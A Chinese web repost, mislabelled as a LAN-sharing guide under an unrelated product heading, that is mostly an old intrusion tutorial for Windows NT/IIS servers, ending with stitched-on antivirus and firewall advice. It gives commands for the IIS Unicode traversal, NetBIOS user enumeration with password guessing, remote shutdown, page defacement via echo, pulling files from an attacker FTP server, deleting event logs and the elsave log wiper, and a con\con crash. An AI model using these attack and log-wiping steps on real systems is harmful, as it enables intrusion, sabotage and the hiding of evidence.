凝胶成像系统多少钱:局域网电脑互访的设置大全（2）

局域网电脑互访的设置大全（2） 弱电学院---文章分类: 电脑 → 网络技术 ∧上一篇      ∨下一篇      ◎最新发布列表... 双击自动滚屏 发布者：弱电网    发布时间：2010-2-2 22:32:00    来源：互联网   
总阅读：303次    本周阅读：5次   今日阅读：1次
6：set 
如果你跑进了一部机子，而且想黑他（这思想只能在特别时候才准有），当
然他的80端口要开，不然你黑给谁看。这时需要用SET命令！ 
        下面是我得到的结果！我来分析它，只是找主页在那而已。 
        COMPUTERNAME=PENTIUMII 
        ComSpec=D:\WINNT\system32\cmd.exe 
        CONTENT_LENGTH=0 
        GATEWAY_INTERFACE=CGI/1.1 
        HTTP_ACCEPT=*/* 
        HTTP_ACCEPT_LANGUAGE=zh-cn 
        HTTP_CONNECTION=Keep-Alive 
        HTTP_HOST=当前登陆者的IP，这里本来是显示我的IP，被我删除
了 
        HTTP_ACCEPT_ENCODING=gzip， deflate 
        HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; 
Windows 98; 
        DigExt) 
        NUMBER_OF_PROCESSORS=1 
        Os2LibPath=D:\WINNT\system32\os2\dll; 
        OS=Windows_NT 
        Path=D:\WINNT\system32;D:\WINNT 
        PATHEXT=.COM;.EXE;.BAT;.CMD 
PATH_TRANSLATED=E:\vlroot主页放在的地址，只要你看到
PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot 
        PROCESSOR_ARCHITECTURE=x86 
        PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3， 
GenuineIntel 
        PROCESSOR_LEVEL=6 
        PROCESSOR_REVISION=0303 
        PROMPT=\$P\$G 
        QUERY_STRING=/c+set 
        REMOTE_ADDR=XX.XX.XX.XX 
        REMOTE_HOST=XX.XX.XX.XX 
        REQUEST_METHOD=GET 
        SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe 
        SERVER_NAME=XX.XX.XX.XX 
        SERVER_PORT=80 
        SERVER_PORT_SECURE=0 
        SERVER_PROTOCOL=HTTP/1.1 
        SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0 
        SystemDrive=D: 
        SystemRoot=D:\WINNT 
        TZ=GMT-9 
        USERPROFILE=D:\WINNT\Profiles\Default User 
        windir=D:\WINNT 
粉红色的那行就是对方主页存放地址，这里告诉大家一个技巧，很笨的技巧
啊，不过只能用这个方法才能100%的找到主页的名称，当你DIR这个目录时
，一定会看到很多文件，你可以把所有文件在浏览器这样输入XX.XX.XX.XX/
文件名，这样只要看到和XX.XX.XX.XX看到的也面一模一样，那么这就是主
页的名称了。 
7：nbtstat 
如果你扫到一部NT的机子，他的136到139其中一个端口开了的话，就要用这
个命令得到用户了。顺便告诉大家这是netbios，得到用户名后就可以猜猜
密码了。例如比较简单的密码，密码和用户名一样的，都试下，不行就暴力
破解吧！现在网上很多NT的机子都开了这些端口的，你可以练习下，我们来
分析得到的结果。命令是nbtstat -A XX.XX.XX.XX -A一定要大写哦。这个
我认为大不大写没有太大差别，用处还是一样的。之后用net use \\对方IP 
连接一下！ net view \\对方IP 查看对方共享文件夹net use X: [url=file://\\IP\]\\IP\[/url]对
方共享文件   映\*对方共享文件夹成为本机的X盘这就是139端口的基本用
法！不过前提是必须对方开共享！ 
netstat -n看看谁连接你
下面是得到的结果。 
        NetBIOS Remote Machine Name Table 
        Name Type Status 
        --------------------------------------------- 
        Registered Registered Registered Registered Registered 
Registered 
        Registered Reg 
        istered Registered Registered Registered 
        MAC Address = 00-E0-29-14-35-BA 
        PENTIUMII <00> UNIQUE 
        PENTIUMII <20> UNIQUE 
        ORAHOTOWN <00> GROUP 
        ORAHOTOWN <1C> GROUP 
        ORAHOTOWN <1B> UNIQUE 
        PENTIUMII <03> UNIQUE 
        INet~Services <1C> GROUP 
        IS~PENTIUMII...<00> UNIQUE 
        ORAHOTOWN <1E> GROUP 
        ORAHOTOWN <1D> UNIQUE 
        ..__MSBROWSE__.<01> GROUP 
粉红色的就是登陆过这部系统的用户，可能你不知道怎么看，大家是不是看
到了一窜数字，只要这窜数字是 <03> 的话，那他前面的就是用户. 
这里的用户是PENTIUMII。 
没有03说明:MAC没和IP捆在一起了 
  8：Shutdown 
关了对方的NT服务器的命令 
Shutdown [url=file://\\IP]\\IP[/url]地址 t:20 
20秒后将NT自动关闭，三思后才能运行这个命令，这样对对方造很大的损失
，要做个有良心的入侵者呀。 
Telnet进去用命令或者是本地用什么软件重启对方电脑 
shutdown -m \\计算机名称 可以远程重起或关闭的 
9：DIR 
这个命令没什么好讲，但是却非常重要，他是查看一目录里的所有文件、文
件夹。你可以本地试下。
10：echo著名的漏洞Unicode，这个命令可以简单的黑一下有这个漏洞的主
机。我们假设我们要把“南京大屠杀铁证如山，任何日本人不得抵赖！”写
入index.htm，有2种方法，大家看看有什么区别。echo 南京大屠杀铁证如
山，任何日本人不得抵赖！>index.htm echo 南京大屠杀铁证如山，任何
日本人不得抵赖！>>index.htm第一个的意思是覆盖index.htm原有的内容
，把“南京大屠杀铁证如山，任何日本人不得抵赖！”写进index.htm。第
二个的意思是把“南京大屠杀铁证如山，任何日本人不得抵赖！”加到
index.htm里面。 “>>”产生的内容将追加进文件中，“>”则将原文件内
容覆盖。这里说明一下，<和>是重定向命令只是一个是输入重定向另一个是
输出重定向，比如我们在命令提示符下就会显示c:\>这个意思就是把C盘的
命令权重定向给我们，同样：也是定向的命令也叫作管道，它是用来连接两
个命令的管道，先执行管道左边的命令，再执行管道右边的命令，不过我是
没能耐把DOS命令说明白的，想研究就买本dos大全看吧，够看半年的了。 
大家可以本地试下。 
可能你会问，这样简单黑下有什么好玩的，其实他可以用来下载主页到对方
的目录里。 
1、首先，我们需要申请一个免费的主页空间。 
2、用echo在可写目录下建立如下内容的txt文件：（以chinren服务器为例
。） 
open upload.chinaren.com（你的FTP服务器，申请时你的空间提供商会给
你的） 
cnhack（你申请时的用户名） 
test（你申请时的密码） 
get index.htm 
c:\inetpub\wwwroot\index.htm（这里是把你空间上的index.htm下载到对
方的c:\inetpub\wwwroot\index.htm） 
bye（退出FTP对话，相当在98下的DOS，用EXIT退出DOS） 
具体的做法： 
        输入 echo open upload.chinaren.com> c:\cnhack.txt 
        输入 echo cnhack >> c:\cnhack.txt 
        输入 echo 39abs >> c:\cnhack.txt 
        输入 echo get index.htm 
c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt 
        最后输入 ftp -s:c:\cnhack.txt （利用ftp的-s参数，执行文件
里的内容。）等命令完成时，文件已经下载到你指定的文件里了。 
      注意：取得文件后，请删除cnhack.txt。（如果不删除，很容易会
给别人看到你的密码。） 
记得要 del c:\cnhack.txt 
11:attrib这个命令是设置文件属性的。如果你想黑一个站，而他的主页的
文件属性设置了只读，那就很可怜呀，想删除他也不行，想覆盖他也不行。
倒！不过有这个命令就别怕了。 
attrib -r index.htm这个命令是把index.htm的只读属性去掉。 如果把“
-”改为“+”则是把这个文件的属性设置为只读attrib +r index.htm这个
命令是把index.htm的属性设置为只读。attrib这个命令先要用来查属性，
比如attrib 文件名，这样就显示出这个文件的属性了，它不止有R这个属性
，其实一共有四种属性， a档案属性 r 只读属性 h隐含属性s系统属性，我
们想用哪个就用哪个，我觉得把我们上传的文件加个隐含属性更有意思，，
，，，继续挑那贴的错. 12:del当你看到这个标题可别倒下啊！现在要离开
127.0.0.1了，要删除日志，当然要删除日志啦！想被捉吗。呵呵。 
        NT的日志有这些 
        del C:\winnt\system32\logfiles\*.* 
        del C:\winnt\ssytem32\config\*.evt 
        del C:\winnt\system32\dtclog\*.* 
        del C:\winnt\system32\*.log 
        del C:\winnt\system32\*.txt 
        del C:\winnt\*.txt 
        del C:\winnt\*.log 
只要删除这些就可以了。有些系统NT安装在D盘或其他盘，就要把C改成其他
盘。 
Internet信息服务FTP日志默认位置：%systemroot%\system32
\logfiles\msftpsvc1\，默认每天一个日志Internet信息服务WWW日志默认
位置：%systemroot%\system32\logfiles\w3svc1\，默认每天一个日志
Scheduler服务日志默认位置：%systemroot%\schedlgu.txt 
        以上日志在注册表里的键： 应用程序日志，安全日志，系统日志
，DNS服务器日志，它们这些LOG文件在注册表中的： 
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog有
的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表，里面
可查到以上日志的定位目录。 
Schedluler服务日志在注册表中
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent 
del确实是删除文件用的，log也确实是日志文件类型，不过按上面这种方法
是不可能清理掉你自身的日志的，因为系统自动运行着日志记录，你在做这
些时它一直都在记录着，并没有停止，大家也会常看到，有时删除某个文件
时会提示系统正在占用拒绝删除的，呵呵，这就明白了，系统正在运行的东
西已经驻留内存里，当然不能这样删除掉了，大家怕了吧，这样删等于帮别
人清理了日志，没删自己那份啊，哈哈哈哈，要问我怎么清理，我只说大家
还是用小榕的工具来清吧，那个又快又好，我们何必去用那些烦琐的命令行
呢，尤其对生长在windows桌面操作下的人们那显然是太麻烦了，我推荐小
榕的elsave工具，清理日志又快又干净，还省电呢，嘻嘻，我可不是做广告
来的。 
借助第三方工具：如小榕的elsave.exe远程清除
system,applicaton,security的软件， 
使用方法很简单，首先利用获得的管理员账号与对方建立ipc会话，net use 
[url=file://\\ip]\\ip[/url] pass /us er: user 
然后命令行下：elsave -s [url=file://\\ip]\\ip[/url] -l application -C，这样就删除了安全
日志。 
其实利用这个软件还可以进行备份日志，只要加一个参数 -f filename就可
以了，在此不再详述。 
局域网要别人死机? 他C盘开了共享的话(win98,而且没有打补丁),你在DOS
下输入 
\\他的IP或机器名\c\con\con 
让PC刀枪不入，个人电脑九大安全策略
　　一、 杀(防)毒软件不可少
病毒的发作给全球计算机系统造成巨大损失，令人们谈“毒”色变。上网的
人中，很少有谁没被病毒侵害过。对于一般用户而裕?紫纫?龅木褪俏?缒
园沧耙惶渍?娴纳倍救砑??纭度鹦巧倍救砑?005版》、《金山毒霸2005》
等等。 
　　现在不少人对防病毒有个误区，就是对待电脑病毒的关键是“杀”，其
实对待电脑病毒应当是以“防”为主。目前绝大多数的杀毒软件都在扮演“
事后诸葛亮”的角色，即电脑被病毒感染后杀毒软件才忙不迭地去发现、分
析和治疗。这种被动防御的消极模式远不能彻底解决计算机安全问题。杀毒
软件应立足于拒病毒于计算机门外。因此应当安装杀毒软件的实时监控程序
，应该定期升级所安装的杀毒软件(如果安装的是网络版，在安装时可先将
其设定为自动升级)，给操作系统打相应补丁、升级引擎和病毒定义码。由
于新病毒的出现层出不穷，现在各杀毒软件厂商的病毒库更新十分频繁，应
当设置每天定时更新杀毒实时监控程序的病毒库，以保证其能够抵御最新出
现的病毒的攻击。 
　　每周要对电脑进行一次全面的杀毒、扫描工作，以便发现并清除隐藏在
系统中的病毒。当用户不慎感染上病毒时，应该立即将杀毒软件升级到最新
版本，然后对整个硬盘进行扫描操作，清除一切可以查杀的病毒。如果病毒
无法清除，或者杀毒软件不能做到对病毒体进行清晰的辨认，那么应该将病
毒提交给杀毒软件公司，杀毒软件公司一般会在短期内给予用户满意的答复
。而面对网络攻击之时，我们的第一反应应该是拔掉网络连接端口，或按下
杀毒软件上的断开网络连接钮。 
　　二、个人防火墙不可替代 
　　如果有条件，安装个人防火墙(Fire Wall)以抵御黑客的袭击。所谓“
防火墙”，是指一种将内部网和公众访问网(Internet)分开的方法，实际上
是一种隔离技术。防火墙是在两个网络通讯时执行的一种访问控制尺度，它
能允许你“同意”的人和数据进入你的网络，同时将你“不同意”的人和数
据拒之门外，最大限度地阻止网络中的黑客来访问你的网络，防止他们更改
、拷贝、毁坏你的重要信息。防火墙安装和投入使用后，并非万事大吉。要
想充分发挥它的安全防护作用，必须对它进行跟踪和维护，要与商家保持密
切的联系，时刻注视商家的动态。因为商家一旦发现其产品存在安全漏洞，
就会尽快发布补救(Patch) 产品，此时应尽快确认真伪(防止特洛伊木马等
病毒)，并对防火墙进行更新。在理想情况下，一个好的防火墙应该能把各
种安全问题在发生之前解决。就现实情况看，这还是个遥远的梦想。目前各
家杀毒软件的厂商都会提供个人版防火墙软件，防病毒软件中都含有个人防
火墙，所以可用同一张光盘运行个人防火墙安装，重点提示防火墙在安装后
一定要根据需求进行详细配置。合理设置防火墙后应能防范大部分的蠕虫入
侵。